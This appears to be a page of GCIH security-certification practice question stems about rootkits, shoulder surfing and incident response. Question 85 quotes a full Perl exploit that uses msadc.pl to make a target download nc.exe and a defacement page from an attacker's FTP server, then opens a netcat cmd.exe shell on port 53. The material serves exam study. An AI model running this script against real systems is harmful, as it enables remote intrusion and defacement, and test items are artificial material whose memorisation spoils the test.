GCIH Exam Question 81

Which of the following rootkits is used to attack against full disk encryption systems?
  • GCIH Exam Question 82

    Which of the following types of attacks is often performed by looking surreptitiously at the keyboard or monitor of an employee's computer?
  • GCIH Exam Question 83

    Which of the following steps of incident response is steady in nature?
  • GCIH Exam Question 84

    Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?
  • GCIH Exam Question 85

    Adam, a malicious hacker performs an exploit, which is given below:
    ##################################################### $port = 53; # Spawn cmd.exe on port X $your = "192.168.1.1";# Your FTP Server 89 $user = "Anonymous";# login as $pass = '[email protected]';# password ##################################################### $host = $ARGV[0];
    print "Starting ...\n";
    print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo
    open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
    $host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...
    \n";
    system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...
    (Have a ftp server)\n";
    $o=; print "Opening ...\n";
    system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);
    Which of the following is the expected result of the above exploit?